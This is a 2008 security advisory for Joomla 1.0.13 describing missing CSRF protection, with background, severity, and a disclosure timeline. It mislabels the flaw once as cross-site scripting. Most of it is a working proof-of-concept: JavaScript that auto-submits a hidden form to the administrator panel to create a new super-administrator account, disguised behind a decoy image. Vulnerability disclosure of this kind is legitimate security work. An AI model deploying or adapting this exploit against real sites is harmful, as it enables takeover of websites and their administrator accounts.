Joomla 1.0.13 CSRF
Author: Jose Carlos Nieto.
Date: Jan 08, 2008
Severity: Mild
There exists a Cross Site Scripting security hole in Joomla 1.0.13.
Background
==========
*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source
<http://en.wikipedia.org/wiki/Open_source_software> content management system
<http://en.wikipedia.org/wiki/Content_management_system> for publishing content
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets
<http://en.wikipedia.org/wiki/Intranet>.
Joomla! is licensed under the GPL
<http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork
<http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo
<http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.
Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a
specially
crafted webpage.
Summary
=======
Joomla! has no CSRF protection. A malicious user can trick an administrator
into viewing
a specially crafted webpage containing an exploit, this exploit can execute
(without permission)
any command the administrator would normally execute, such as publish a content
or even add a new
administrator.
Solution
========
This problem has no solution at this time.
Disclosure timeline
===================
Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.
Proof of Concept
================
If a logged in administrator visits this page a new administrator will be added
to the victim's
Joomla powered website.
---- exploit code ----
<script type="text/javascript">
window.onload = function() {
var url = "http://joomlasite.com/joomla/administrator/index2.php";
var gid = 25;
var user = 'custom_username';
var pass = 'custom_password';
var email = 'joe_cool@xxxxxxxxxxx';
var param = {
name: user,
username: user,
email: email,
password: pass,
password2: pass,
gid: gid,
block: 0,
option: 'com_users',
task: 'save',
sendEmail: 1
};
var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">
---- exploit code ----